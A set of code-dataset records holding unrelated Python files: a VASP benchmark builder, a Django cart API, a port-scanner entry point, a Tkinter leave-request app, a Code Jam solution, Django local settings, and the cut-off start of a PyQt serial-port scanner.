lattice.b, lattice.c)\n\tfor i in range(len(k_list)):\n\t\tka_folder_list.append(make_calculation_folder(600, k_list[i], k_mul_a_lst[i], incar, kpoints, poscar, potcar, submit))\n\tconst_k_set = k_list[0]\n\tconst_k_mul_a = k_mul_a_lst[0]\n\tfor i in range(len(k_list)):\n\t\tnew_av = sum(k_list[i])/3\n\t\told_av = sum(const_k_set)/3\n\t\tif abs(new_av-10) < abs(old_av-10):\n\t\t\tconst_k_set = k_list[i]\n\t\t\tconst_k_mul_a = k_mul_a_lst[i]\n\tfor encut in encut_list:\n\t\tencut_folder_list.append(make_calculation_folder(encut, const_k_set, const_k_mul_a, incar, kpoints, poscar, potcar, submit))\n\tos.chdir(current_dir)\n\treturn encut_folder_list, ka_folder_list, encut_list, k_mul_a_lst\n\n\ndef make_calculation_folder(encut, k_set, k_mul_a, incar, kpoints, poscar, potcar, submit, name=None):\n\t\"\"\"make_calculation_folder: Given an ENCUT value to be tests, a set of KPOINTS to be tested, a ka to be tested,\n\tvasp input objects Incar, Kpoints, Poscar, and Potcar, and a submission script as a string, try to make a folder\n\tcontaining the given files with the given inputs.\"\"\"\n\tif not name: name = str(encut) + \"encut-\" + str(round(k_mul_a,2)) + \"ka\"\n\ttry:\n\t\tsubmit = submit.replace(\"#PBS -N TEST_name\", \"#PBS -N \" + name)\n\t\tsubprocess.call([\"mkdir\", name])\n\t\tcurrent_dir = os.getcwd()\n\t\tos.chdir(current_dir+\"/\"+name)\n\t\tincar[\"ENCUT\"] = encut\n\t\tincar[\"NSW\"] = 0\n\t\tincar.write_file(\"INCAR\")\n\t\tkpoints.kpts = [k_set]\n\t\tkpoints.write_file(\"KPOINTS\")\n\t\tposcar.write_file(\"POSCAR\")\n\t\tpotcar.write_file(\"POTCAR\")\n\t\topen(\"submit.pbs\", \"w\").write(submit)\n\t\tos.chdir(current_dir)\n\texcept:\n\t\tprint(\"Could not make the desired directory \"+ name)\n\treturn name\n\ndef make_benchmark_folder():\n\t\"\"\"make_benchmark_folder: Asks the user for the names of VASP input files, submission script, and their choice of\n\tnew directory in which to deposit calculation folder, runs read_and_choose_test_data.\"\"\"\n\tread_and_choose_test_data(input(\"Incar file name: \"),\\\n\t\tinput(\"Kpoints file name: \"),\\\n\t\tinput(\"Poscar file name: \"),\\\n\t\tinput(\"Potcar file name: \"),\\\n\t\tinput(\"Submission script name: \"),\\\n\t\tinput(\"Benchmark folder name: \"))","sub_path":"benchmark_builder.py","file_name":"benchmark_builder.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493515854","text":"from rest_framework import viewsets, mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom carts.models import Cart\nfrom carts.serializers import CartSerializer\nfrom utils.func import manage_cart\nfrom utils.status_code import SUCCESS\n\n\nclass CartView(viewsets.GenericViewSet,\n mixins.ListModelMixin,\n mixins.UpdateModelMixin):\n \"\"\"购物车\"\"\"\n queryset = Cart.objects.all()\n serializer_class = CartSerializer\n\n def list(self, request, *args, **kwargs):\n \"\"\"显示购物车商品\"\"\"\n user = request.user\n # 获取当前用户的的购物车信息\n queryset = self.get_queryset().filter(user=user)\n serializer = self.get_serializer(queryset, many=True)\n total_price = 0\n all_select = 1\n for item in queryset:\n # 计算选择商品的总价\n if item.is_select:\n total_price += item.num * item.goods.price\n else:\n all_select = 0\n data = {'carts': serializer.data,\n 'total_price': total_price,\n 'all_select': all_select,\n 'username': user.username,\n 'mobile': user.mobile}\n return Response(data)\n\n def update(self, request, *args, **kwargs):\n \"\"\"修改商品选择\"\"\"\n # 获取到当前的对象实例\n instance = self.get_object()\n instance.is_select = not instance.is_select\n instance.save()\n return Response({'code': SUCCESS[0], 'msg': SUCCESS[1]})\n\n @action(methods=['POST'], detail=False)\n def add_cart(self, request):\n \"\"\"添加商品到购物车\"\"\"\n manage_cart(request, 1)\n return Response({'code': SUCCESS[0], 'msg': SUCCESS[2]})\n\n @action(methods=['POST'], detail=False)\n def sub_cart(self, request):\n \"\"\"删除商品\"\"\"\n manage_cart(request, 0)\n return Response({'code': SUCCESS[0], 'msg': SUCCESS[3]})\n\n @action(methods=['PATCH'], detail=False)\n def change_select(self, request):\n \"\"\"是否全选商品\"\"\"\n user = request.user\n if Cart.objects.filter(user=user, is_select=False).exists():\n # 判断是否有未选择的商品,如果有将选择属性修改为True\n Cart.objects.filter(user=user).update(is_select=True)\n else:\n Cart.objects.filter(user=user).update(is_select=False)\n return Response({'code': SUCCESS[0], 'msg': SUCCESS[1]})\n","sub_path":"lsj/carts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334720588","text":"#!/usr/bin/env python3\n\nimport json\n\nfrom portscanner.argumentparser import ArgumentParser, help_message\nfrom portscanner.core import ScanController, ScanTarget\n\n\ndef main():\n arg_parser = ArgumentParser()\n\n if not arg_parser.has_valid_args():\n help_message()\n\n st = ScanTarget(arg_parser.ip, arg_parser.methods_ports)\n ps = ScanController(st)\n\n if arg_parser.json:\n results = ps.scan_to_list(arg_parser.threads)\n json_object = json.dumps(results, default=lambda sr: sr.__dict__(), indent=4)\n print(json_object)\n\n else:\n print('Scanning for IP {}'.format(arg_parser.ip))\n print('METHOD\\tPORT\\tSTATUS')\n ps.scan(arg_parser.threads)\n\n\nif __name__ == '__main__':\n try:\n main()\n\n except KeyboardInterrupt:\n exit()\n","sub_path":"portscanner.py","file_name":"portscanner.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"73117178","text":"from tkinter import *\nimport tkinter.messagebox as message_box\nfrom tkinter import ttk\nimport datetime\nimport calendar\nimport os\nimport sqlite3\n\nfrom sqlite3 import Error\n\ntry:\n conn = sqlite3.connect('draft.s3db')\n c = conn.cursor()\nexcept Error as e:\n print(e)\n\nnow = datetime.datetime.now()\n\n# ---- Variables ----\n\nday_of_week = calendar.day_abbr[now.weekday()]\nday = now.day\nmonth = calendar.month_name[now.month]\nyear = now.year\npolicy_path = \"leave_policy.txt\"\nnum_pending_requests = 1\nhalf_day = 0 # 0 for full day, 1 for half day\n# test data\nnum_days = 15\nrequest_id = 1234\nleave_date = \"13/06/19\"\nsubmission_date = \"03/05/19\"\nleave_type = \"Holiday\"\nemp_name = \"Abel Maclead\"\nemp_comment = \"I am going on holiday\"\nsigned_off = \"No\"\nmgr_comment = \"All employees must attend on this date\"\nmgr_name = \"Steven Tasks\"\nviewer_listbox_headers = ('RequestID', 'Date', 'Signed Off')\nmanager_listbox_headers = ('RequestID', 'Date', 'EmpID', 'Name')\n\n\n# ---- Methods ----\n\ndef open_leave_request():\n print(\"Opening Leave Request Form\")\n ShowLeaveRequestForm()\n leaverequestform.mainloop()\n\n\ndef open_request_viewer():\n print(\"Opening Request Viewer\")\n ShowRequestViewerForm()\n requestviewerform.mainloop()\n\n\ndef open_employee_calendar():\n print(\"Opening Employee Calendar\")\n os.startfile(r'EmployeeCalendarForm.py')\n\n\ndef open_policy_viewer():\n print(\"Opening Policy Viewer Form\")\n ShowPolicyViewerForm()\n policyviewerform.mainloop()\n\n\ndef open_manager_calendar():\n print(\"Opening Manager Calendar\")\n # print(\"*Actually opens calendar options form* LIKE A BOSS\")\n # os.startfile(r'CalendarOptionsForm.py')\n os.startfile(r'ManagerCalendarForm.py')\n\n\ndef open_request_manager():\n print(\"Opening Leave Request Manager\")\n os.startfile(r'RequestManagerForm.py')\n\n\ndef close_policy_form():\n policyviewerform.destroy()\n\n\ndef submit_request():\n message_box.showinfo(\"\", \"Leave Request Submitted\")\n leaverequestform.destroy()\n\n\ndef cancel_request():\n print(\"Leave Request Cancelled\")\n leaverequestform.destroy()\n\n\ndef amend_request():\n print(\"Amending Request\")\n ShowLeaveRequestForm()\n leaverequestform.mainloop()\n\n\ndef revoke_request():\n result = message_box.askquestion(\"Revoke Request\", \"Are you sure you want to revoke this request?\", icon='warning')\n\n if result == 'yes':\n message_box.showinfo(\"\", \"Request Revoked\")\n print(\"Request Revoked\")\n else:\n print(\"Request Revoke Canceled\")\n\n\ndef ShowEmployeeDashboardForm():\n global employeedashboardform\n employeedashboardform = Toplevel()\n employeedashboardform.title(\"Employee Leave Dashboard\")\n screen_width = employeedashboardform.winfo_screenwidth()\n screen_height = employeedashboardform.winfo_screenheight()\n empFrmwidth = 900\n empFrmheight = 500\n x = (screen_width / 2) - (empFrmwidth / 2)\n y = (screen_height / 2) - (empFrmheight / 2)\n employeedashboardform.geometry('%dx%d+%d+%d' % (empFrmwidth, empFrmheight, x, y))\n employeedashboardform.resizable(0, 0)\n employeedashboardform.geometry(\"%dx%d+%d+%d\" % (empFrmwidth, empFrmheight, x, y))\n EmployeeDashboardForm()\n\n\ndef ShowManagerDashboardForm():\n global managerdashboardform\n managerdashboardform = Toplevel()\n managerdashboardform.title(\"Manager Leave Dashboard\")\n screen_width = managerdashboardform.winfo_screenwidth()\n screen_height = managerdashboardform.winfo_screenheight()\n manFrmWidth = 900\n manFrmHeight = 650\n x = (screen_width / 2) - (manFrmWidth / 2)\n y = (screen_height / 2) - (manFrmHeight / 2)\n managerdashboardform.geometry('%dx%d+%d+%d' % (manFrmWidth, manFrmHeight, x, y))\n managerdashboardform.resizable(0, 0)\n managerdashboardform.geometry(\"%dx%d+%d+%d\" % (manFrmWidth, manFrmHeight, x, y))\n ManagerDashboardForm()\n\n\ndef ShowPolicyViewerForm():\n global policyviewerform\n policyviewerform = Toplevel()\n policyviewerform.title(\"Leave Policy Viewer\")\n screen_width = policyviewerform.winfo_screenwidth()\n screen_height = policyviewerform.winfo_screenheight()\n viewFrmWidth = 900\n viewFrmHeight = 600\n x = (screen_width / 2) - (viewFrmWidth / 2)\n y = (screen_height / 2) - (viewFrmHeight / 2)\n policyviewerform.geometry('%dx%d+%d+%d' % (viewFrmWidth, viewFrmHeight, x, y))\n policyviewerform.resizable(0, 0)\n policyviewerform.geometry(\"%dx%d+%d+%d\" % (viewFrmWidth, viewFrmHeight, x, y))\n PolicyViewerForm()\n\n\ndef ShowLeaveRequestForm():\n global leaverequestform\n leaverequestform = Toplevel()\n leaverequestform.title(\"Leave Request Form\")\n screen_width = leaverequestform.winfo_screenwidth()\n screen_height = leaverequestform.winfo_screenheight()\n requestFrmWidth = 900\n requestFrmHeight = 550\n x = (screen_width / 2) - (requestFrmWidth / 2)\n y = (screen_height / 2) - (requestFrmHeight / 2)\n leaverequestform.geometry('%dx%d+%d+%d' % (requestFrmWidth, requestFrmHeight, x, y))\n leaverequestform.resizable(0, 0)\n leaverequestform.geometry(\"%dx%d+%d+%d\" % (requestFrmWidth, requestFrmHeight, x, y))\n LeaveRequestForm()\n\n\ndef ShowRequestViewerForm():\n global requestviewerform\n requestviewerform = Toplevel()\n requestviewerform.title(\"Leave Request Viewer Form\")\n screen_width = requestviewerform.winfo_screenwidth()\n screen_height = requestviewerform.winfo_screenheight()\n viewerFrmWidth = 900\n viewerFrmHeight = 500\n x = (screen_width / 2) - (viewerFrmWidth / 2)\n y = (screen_height / 2) - (viewerFrmHeight / 2)\n requestviewerform.geometry('%dx%d+%d+%d' % (viewerFrmWidth, viewerFrmHeight, x, y))\n requestviewerform.resizable(0, 0)\n requestviewerform.geometry(\"%dx%d+%d+%d\" % (viewerFrmWidth, viewerFrmHeight, x, y))\n RequestViewerForm()\n\n\ndef EmployeeDashboardForm():\n ufix_logo = PhotoImage(file=\"UfixLogo.png\")\n mini_calendar = PhotoImage(file=\"calendar.png\")\n\n TopLabels = Frame(employeedashboardform, width=900, height=400, relief=\"raise\")\n TopLabels.pack(side=TOP, padx=20)\n\n TopLabels.grid_rowconfigure(0, weight=1)\n TopLabels.grid_columnconfigure(0, weight=1)\n\n Notification = Frame(employeedashboardform, width=900, height=70, relief=\"raise\")\n Notification.pack(side=TOP, padx=20, pady=20)\n Buttons = Frame(employeedashboardform, width=900, height=180, relief=\"raise\")\n Buttons.pack(side=BOTTOM, fill=BOTH, expand=YES)\n\n Buttons.grid_rowconfigure(0, weight=1)\n Buttons.grid_columnconfigure(0, weight=1)\n\n lbl_title = Label(TopLabels, justify=LEFT, anchor=W, width=100, font=('Arial', 20),\n text=\"Welcome \" + user_name + \"\\n\\nYou currently have \" + str(\n num_days) + \" days of leave remaining.\")\n lbl_title.grid(row=0, column=0)\n\n lbl_notify_expire = Label(Notification, width=100, height=2, font=('Arial', 20), text=\"\")\n lbl_notify_expire.pack()\n\n pic_mini_calendar = Label(TopLabels, anchor=NE, image=mini_calendar)\n\n pic_mini_calendar.grid(row=0, column=3)\n\n pic_ufix_logo = Label(Buttons, anchor=SE, justify=RIGHT, image=ufix_logo)\n\n pic_ufix_logo.grid(row=2, column=3)\n\n lbl_current_date = Label(TopLabels, width=11, bg=\"#fff\", font=('Arial', 15),\n text=day_of_week + \" \" + str(day) + \"\\n\" + month + \"\\n\" + str(year))\n lbl_current_date.grid(row=0, column=3)\n\n btn_createRequest = Button(Buttons, width=15, font=('Arial', 20), text=\"Request Leave\",\n command=open_leave_request)\n btn_createRequest.grid(row=0, column=1, padx=2)\n\n btn_viewRequests = Button(Buttons, width=15, font=('Arial', 20), text=\"View Requests\",\n command=open_request_viewer)\n btn_viewRequests.grid(row=0, column=2, padx=2)\n\n btn_viewCalendar = Button(Buttons, width=15, font=('Arial', 20), text=\"View Calendar\", padx=20,\n command=open_employee_calendar)\n btn_viewCalendar.grid(row=0, column=3, padx=2)\n\n btn_viewPolicy = Button(Buttons, width=20, font=('Arial', 20), text=\"View UFix Ltd. Leave Policy\", padx=20,\n command=open_policy_viewer)\n\n btn_viewPolicy.grid(row=2, column=2)\n\n if days_expiring_soon > 0:\n lbl_notify_expire.configure(bg='#e6586f')\n lbl_notify_expire.configure(fg='white')\n if days_expiring_soon == 1:\n lbl_notify_expire.configure(\n text=\"! You have \" + str(days_expiring_soon) + \" day which need to be booked soon\")\n else:\n lbl_notify_expire.configure(\n text=\"! You have \" + str(days_expiring_soon) + \" days which need to be booked soon\")\n\n\ndef ManagerDashboardForm():\n TopLabels = Frame(managerdashboardform, width=900, height=400, relief=\"raise\")\n TopLabels.pack(side=TOP, padx=20)\n\n TopLabels.grid_rowconfigure(0, weight=1)\n TopLabels.grid_columnconfigure(0, weight=1)\n\n Notification = Frame(managerdashboardform, width=900, height=70, relief=\"raise\")\n Notification.pack(side=TOP, padx=20, pady=20)\n\n Buttons = Frame(managerdashboardform, width=900, height=100, relief=\"raise\")\n Buttons.pack(side=BOTTOM, fill=BOTH, expand=YES)\n\n Buttons.grid_rowconfigure(1, weight=1)\n Buttons.grid_columnconfigure(1, weight=1)\n\n lbl_title = Label(TopLabels, justify=LEFT, anchor=W, width=100, font=('Arial', 20),\n text=\"Welcome \" + user_name + \"\\n\\nYou currently have \" + str(\n num_days) + \" days of leave remaining.\")\n lbl_title.grid(row=0, column=0)\n\n lbl_notify_expire = Label(Notification, width=100, height=2, font=('Arial', 20), text=\"\")\n lbl_notify_expire.pack()\n\n lbl_notify_requests = Label(Notification, width=100, height=2, font=('Arial', 20), text=\"\")\n lbl_notify_requests.pack(pady=4)\n\n mini_calendar = PhotoImage(file=\"calendar.png\")\n pic_mini_calendar = Label(TopLabels, anchor=NE, image=mini_calendar)\n\n pic_mini_calendar.grid(row=0, column=3)\n\n ufix_logo = PhotoImage(file=\"UfixLogo.png\")\n pic_ufix_logo = Label(Buttons, justify=RIGHT, image=ufix_logo)\n\n pic_ufix_logo.grid(row=3, column=2)\n\n lbl_current_date = Label(TopLabels, width=11, bg=\"#fff\", font=('Arial', 15),\n text=day_of_week + \" \" + str(day) + \"\\n\" + month + \"\\n\" + str(year))\n lbl_current_date.grid(row=0, column=3)\n\n btn_createRequest = Button(Buttons, width=15, font=('Arial', 20), text=\"Request Leave\", command=open_leave_request)\n\n btn_createRequest.grid(row=0, column=0, padx=75)\n\n btn_viewRequests = Button(Buttons, width=15, font=('Arial', 20), text=\"View Your Requests\",\n command=open_request_viewer)\n btn_viewRequests.grid(row=2, column=0)\n\n btn_viewCalendar = Button(Buttons, width=15, font=('Arial', 20), text=\"View Calendar\",\n command=open_manager_calendar)\n btn_viewCalendar.grid(row=0, column=1)\n\n btn_manageRequests = Button(Buttons, width=15, font=('Arial', 20), text=\"Manage Requests\",\n command=open_request_manager)\n btn_manageRequests.grid(row=2, column=1)\n\n btn_viewPolicy = Button(Buttons, width=40, font=('Arial', 20), padx=30, text=\"View UFix Ltd. Leave Policy\",\n command=open_policy_viewer)\n btn_viewPolicy.grid(row=3, column=0, columnspan=2)\n\n if days_expiring_soon > 0:\n lbl_notify_expire.configure(bg='#e6586f')\n lbl_notify_expire.configure(fg='white')\n if days_expiring_soon == 1:\n lbl_notify_expire.configure(\n text=\"! You have \" + str(days_expiring_soon) + \" day which need to be booked soon\")\n else:\n lbl_notify_expire.configure(\n text=\"! You have \" + str(days_expiring_soon) + \" days which need to be booked soon\")\n\n if num_pending_requests > 0:\n lbl_notify_requests.configure(bg='#7bbc6e')\n lbl_notify_requests.configure(fg='white')\n if num_pending_requests == 1:\n lbl_notify_requests.configure(text=\"* There is \" + str(num_pending_requests) + \" pending leave request\")\n else:\n lbl_notify_requests.configure(text=\"* There are \" + str(num_pending_requests) + \" pending leave requests\")\n\n\ndef PolicyViewerForm():\n Policy = Frame(policyviewerform, width=900, height=350, relief=\"raise\")\n Policy.pack(side=TOP, padx=20)\n\n CloseButton = Frame(policyviewerform, width=900, height=150, relief=\"raise\")\n CloseButton.pack(side=BOTTOM)\n\n btn_close = Button(CloseButton, width=15, font=('Arial', 20), text=\"Close\", command=close_policy_form)\n btn_close.pack(side=RIGHT, anchor=SE)\n\n txt_policy = Text(Policy, width=76, height=23, font=('Arial', 15))\n txt_policy.pack(side=LEFT, anchor=NW)\n txt_policy.insert(END, open(policy_path).read())\n txt_policy.configure(state=DISABLED)\n txt_scroll = ttk.Scrollbar(Policy, orient=\"vertical\", command=txt_policy.yview)\n\n txt_policy.configure(yscrollcommand=txt_scroll.set)\n\n txt_scroll.pack(side=RIGHT, anchor=E, fill=\"y\", )\n\n\ndef LeaveRequestForm():\n TopLabels = Frame(leaverequestform, width=900, height=400, relief=\"raise\")\n TopLabels.pack(side=TOP, padx=20)\n\n TopLabels.grid_rowconfigure(0, weight=1)\n TopLabels.grid_columnconfigure(0, weight=1)\n\n Options = Frame(leaverequestform, width=450, height=180, relief=\"raise\")\n Options.pack(side=TOP, fill=BOTH, expand=YES)\n\n Options.grid_rowconfigure(0, weight=1)\n Options.grid_columnconfigure(0, weight=1)\n\n Buttons = Frame(leaverequestform, width=800, height=180, relief=\"raise\")\n Buttons.pack(side=LEFT, fill=BOTH, expand=YES)\n\n Buttons.grid_rowconfigure(0, weight=1)\n Buttons.grid_columnconfigure(0, weight=1)\n\n Logo = Frame(leaverequestform, width=100, height=180, relief=\"raise\")\n Logo.pack(side=RIGHT, fill=BOTH, expand=YES)\n\n Logo.grid_rowconfigure(0, weight=1)\n Logo.grid_columnconfigure(0, weight=1)\n\n lbl_title = Label(TopLabels, justify=LEFT, anchor=W, width=100, font=('Arial', 20),\n text=\"You currently have \" + str(num_days) + \" days of leave remaining.\\n\\n\" + \"Request ID: #\" + str(request_id) + \"\\nEmployee ID: \" + str(emp_no))\n lbl_title.grid(row=0, column=0)\n\n mini_calendar = PhotoImage(file=\"calendar.png\")\n pic_mini_calendar = Label(TopLabels, anchor=NE, image=mini_calendar)\n\n pic_mini_calendar.grid(row=0, column=3)\n\n ufix_logo = PhotoImage(file=\"UfixLogo.png\")\n pic_ufix_logo = Label(Logo, anchor=SE, justify=RIGHT, image=ufix_logo)\n\n pic_ufix_logo.grid(row=0, column=0)\n\n lbl_current_date = Label(TopLabels, width=11, bg=\"#fff\", font=('Arial', 15),\n text=day_of_week + \" \" + str(day) + \"\\n\" + month + \"\\n\" + str(year))\n lbl_current_date.grid(row=0, column=3)\n\n lbl_leave_date = Label(Options, width=11, font=('Arial', 20), text=\"Leave Date: \", justify=LEFT)\n lbl_leave_date.grid(row=0, column=0)\n\n lbl_comments = Label(Options, width=11, font=('Arial', 20), text=\"Comments: \", justify=LEFT)\n lbl_comments.grid(row=0, column=2)\n\n lbl_leave_type = Label(Options, width=11, font=('Arial', 20), text=\"Leave Type: \", justify=LEFT)\n lbl_leave_type.grid(row=2, column=0)\n\n btn_cancel = Button(Buttons, width=15, font=('Arial', 20), text=\"Cancel\", command=cancel_request)\n btn_cancel.grid(row=0, column=1, padx=2)\n\n cmb_date_picker = ttk.Combobox(Options, width=15, font=('Arial', 20))\n cmb_date_picker['values'] = \"peekaboo\"\n cmb_date_picker.grid(row=0, column=1)\n\n cmb_leave_type = ttk.Combobox(Options, width=15, font=('Arial', 20))\n cmb_leave_type['values'] = (\"Holiday\", \"Paternity\", \"Emergency\", \"Sickness\", \"Bereavement\")\n cmb_leave_type.grid(row=2, column=1)\n\n txt_comments = Text(Options, width=20, height=5, font=('Arial', 20))\n txt_comments.grid(row=0, column=3, padx=2)\n\n opt_full_day = ttk.Radiobutton(Options, width=20, variable=half_day, value=0, text=\"Full Day\")\n opt_full_day.grid(row=1, column=0, padx=2)\n\n opt_half_day = ttk.Radiobutton(Options, width=20, variable=half_day, value=1, text=\"Half Day\")\n opt_half_day.grid(row=1, column=1, padx=2)\n\n btn_submit = Button(Buttons, width=15, font=('Arial', 20), text=\"Submit\",command=lambda: RequestLeave(half_day, cmb_date_picker.currenttext(), txt_comments.get(\"1.0\", END)))\n btn_submit.grid(row=0, column=0, padx=2)\n\n\ndef RequestLeave(half_day, date, com):\n cursor = conn.execute(\"SELECT ManagerID from Employee Where EmployeeID = ?\", (emp_no,))\n for row in cursor:\n ManID = row[0]\n cursor = conn.execute(\"SELECT RequestID FROM Request ORDER BY RequestID DESC LIMIT 1\")\n for row in cursor:\n RequestID = row[0]\n RequestID = RequestID + 1\n # sql = \"\"\" INSERT INTO Request (?, ?, ?, ?, ?, ?, ?, ?) VALUES (%s, %s, %s, %s, %s, %s, %s) \"\"\"\n # val = (RequestID, emp_no, ManID, half_day, date, 'N', com)\n cursor.execute(\"INSERT INTO Request VALUES (?, ?, ?, ?, ?, ?, ?, ?)\", (RequestID, emp_no, ManID, half_day, date, 'N', com, \"\"))\n conn.commit()\n\n\ndef RequestViewerForm():\n fraListBox = Frame(requestviewerform, width=300, height=500, relief=\"raise\")\n fraListBox.pack(side=LEFT, anchor=NW)\n\n fraInfo = Frame(requestviewerform, width=450, height=500, relief=\"raise\")\n fraInfo.pack(side=RIGHT, anchor=NE)\n\n fraInfo.grid_rowconfigure(0, weight=1)\n fraInfo.grid_columnconfigure(0, weight=1)\n\n fraInfo.grid_rowconfigure(0, weight=1)\n fraInfo.grid_columnconfigure(0, weight=1)\n\n lbl_title = Label(fraInfo, justify=LEFT, anchor=W, width=120, font=('Arial', 18),\n text=\"Details for request # \" + str(\n request_id) + \" submitted on \" + submission_date + \"\\n\\n\" + \"Leave Date: \" + leave_date + \"\\nLeave Type: \" + leave_type + \"\\nYour Comments: \\n\" + emp_comment)\n lbl_title.grid(row=0, column=0, columnspan=4)\n\n lbl_mgr_detail = Label(fraInfo, justify=LEFT, anchor=W, width=120, font=('Arial', 18),\n text=\"\\nSigned off: \" + signed_off + \"\\nManager's Comment:\\n''\" + mgr_comment + \"''\\nManager: \" + mgr_name)\n lbl_mgr_detail.grid(row=1, column=0, columnspan=4)\n\n ufix_logo = PhotoImage(file=\"UfixLogo.png\")\n pic_ufix_logo = Label(fraInfo, anchor=SE, justify=RIGHT, image=ufix_logo)\n\n pic_ufix_logo.grid(row=5, column=3)\n\n lst_leave_req = ttk.Treeview(fraListBox, columns=viewer_listbox_headers, show=\"headings\", height=26)\n lst_leave_req.pack(side=TOP)\n\n lst_leave_req.heading('#1', text='RequestID', anchor=CENTER)\n lst_leave_req.heading('#2', text='Date', anchor=CENTER)\n lst_leave_req.heading('#3', text='Signed Off', anchor=CENTER)\n\n lst_leave_req.column('#1', stretch=YES, minwidth=50, width=100)\n lst_leave_req.column('#2', stretch=YES, minwidth=50, width=100)\n lst_leave_req.column('#3', stretch=YES, minwidth=50, width=100)\n\n cursor = conn.execute(\"SELECT RequestID, LeaveDate, SignedOff from Request Where EmployeeID = ?\", (emp_no,))\n for row in cursor:\n print(row[0])\n lst_leave_req.insert('', 'end', values=((\"1\"), (row[1]), (row[2])))\n\n ttk.Scrollbar(orient=\"vertical\", command=lst_leave_req.yview)\n\n btn_amend = Button(fraInfo, width=15, font=('Arial', 18), text=\"Amend Request\", command=amend_request)\n btn_amend.grid(row=3, column=1, rowspan=8)\n\n btn_revoke = Button(fraInfo, width=15, font=('Arial', 18), text=\"Revoke Request\", command=revoke_request)\n btn_revoke.grid(row=3, column=2, rowspan=8)\n\n\n# ---- Initialization ----\n\n\nglobal emp_no\nemp_no = input(\"Please enter EmpID\")\nManager = \"Not found\"\ncursor = conn.execute(\"SELECT Manager from Employee Where EmployeeID = ?\", (emp_no,))\nfor row in cursor:\n Manager = row[0]\n\n# Get Job role to know which form to load\nif Manager == \"Y\":\n # load Manager Form\n print(\"Opening Manager Form\")\n cursor = conn.execute(\"SELECT Name, Days_Of_Leave, RolloverDays from Employee Where EmployeeID = ?\", (emp_no,))\n for row in cursor:\n user_name = row[0]\n num_days = row[1]\n Rollover = row[2]\n\n days_expiring_soon = (num_days - Rollover) # NOT SURE HOW\n\n ShowManagerDashboardForm()\n managerdashboardform.mainloop()\nelif Manager == \"N\":\n # load Employee Form\n print(\"Opening Employee Form\")\n\n cursor = conn.execute(\"SELECT Name, Days_Of_Leave, RolloverDays from Employee Where EmployeeID = ?\", (emp_no,))\n for row in cursor:\n user_name = row[0]\n num_days = row[1]\n Rollover = row[2]\n\n days_expiring_soon = (num_days - Rollover) # NOT SURE HOW\n\n ShowEmployeeDashboardForm()\n employeedashboardform.mainloop()\nelif Manager == \"Not found\":\n # not found\n print(\"Not found\")\n","sub_path":"LeaveSystem.py","file_name":"LeaveSystem.py","file_ext":"py","file_size_in_byte":20633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"205668782","text":"#!/usr/bin/env python\r\n# -*- coding: utf8 -*-\r\n\r\nfrom string import digits\r\n\r\ninputfile = 'A-large.in'\r\noutputfile = 'large-output.op'\r\n\r\ndef solve(data):\r\n d = list(digits)\r\n dx = str(data)\r\n x=1\r\n while(len(d)>0):\r\n dx = str(data*x)\r\n for i in dx:\r\n if i in d: d.remove(i)\r\n x+=1\r\n return dx\r\n\r\n\r\nif __name__ == '__main__':\r\n inputdata = open(inputfile, 'rb').readlines()\r\n cases = int(inputdata[0])\r\n inputdata.pop(0)\r\n with open(outputfile, 'wb') as out:\r\n for case in range(cases):\r\n n = inputdata[0].strip()\r\n if n=='0': result = 'INSOMNIA'\r\n else: result = solve(int(n))\r\n sol = 'Case #%d: %s\\n' %(case+1, str(result))\r\n out.write(sol)\r\n inputdata = inputdata[1:]","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_tux_tux_counting-sheep.py","file_name":"16_0_1_tux_tux_counting-sheep.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25132751","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nLocal settings for traffic project.\n\"\"\"\n__author__ = \"Ariel Gerardo Rios (ariel.gerardo.rios@gmail.com)\"\n\nfrom base import *\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '$zga6v8+n2xzo9(yf)896=x9=g%$s4c^uf4q)ajv&z#k^d!!o9'\n\nALLOWED_HOSTS = ['*']\n","sub_path":"traffic/traffic/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"178795624","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtSerialPort import *\n\n\nclass Scanner(QObject):\n finished = pyqtSignal()\n newPort = pyqtSignal(str)\n\n def __init__(self, parent=None):\n QObject.__init__(self, parent)\n self.stopped = False\n\n def doScan(self):\n for portInfo in QSerialPortInfo.availablePorts():\n if portInfo.isValid() and not portInfo.isBusy():\n if self.isPayloadValid(portInfo):\n print(portInfo.portName())\n self.newPort.emit(portInfo.portName())\n QThread.msleep(10)\n self.finished.emit()\n\n def isPayloadValid(self, info):\n serial = QSerialPort(info)\n serial.setBaudRate(QSerialPort.Baud9600)\n if serial.open(QSerialPort.ReadOnly):\n while serial.waitForReadyRead(100):\n QThread.currentThread().msleep(10)\n if bytearray(serial.read(1)).decode() == \"*\":\n return True\n return False\n\n\nclass Listener(QObject):\n def __init__(self, portName, parent=None):\n QObject.__init__(self, parent)\n self.serial = QSerialPort(portName)\n self.serial.setBaudRate(QSerialPort.Baud9600)\n self.serial.readyRead.connect(self.onReadyRead)\n self.serial.error.connect(self.handleError)\n\n def onReadyRead(self):\n print(\"read\", self.serial.readAll())\n\n def handleError(self, error):\n print(\"error\", error)\n\n def start(self):\n print(self.serial.open(QSerialPort.ReadWrite))\n\n\nclass Manager(QObject):\n def __init__(self, parent=None):\n QObject.__init__(self, parent)\n self.scanner = Scanner(self)\n self.thread = QThread(self)\n 